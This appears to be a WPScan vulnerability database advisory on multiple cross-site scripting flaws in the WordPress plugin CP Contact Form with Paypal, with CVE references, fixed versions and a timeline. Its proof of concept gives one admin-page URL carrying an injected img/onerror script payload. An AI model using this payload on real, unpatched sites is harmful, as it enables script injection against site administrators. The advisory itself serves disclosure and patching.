CP Contact Form with Paypal <= 1.3.01 - Multiple XSS



Proof of Concept
Version <= 1.2.97 - /wp-admin/admin.php?page=cp_contact_form_paypal.php&edit=1&cal=1&item=css"><img src=x onerror=alert(/XSS/)>&r=1 (fixed in 1.2.98)

Affects Plugin

fixed in version 1.3.02

References

CVE 2019-14784
CVE 2019-14785
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2110906%40cp-contact-form-with-paypal&old=2102944%40cp-contact-form-with-paypal

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2855
Verified No
WPVDB ID 9381

Timeline

Publicly Published 2019-06-23 (5 months ago)
Added 2019-06-23 (5 months ago)
Last Updated 2019-08-21 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin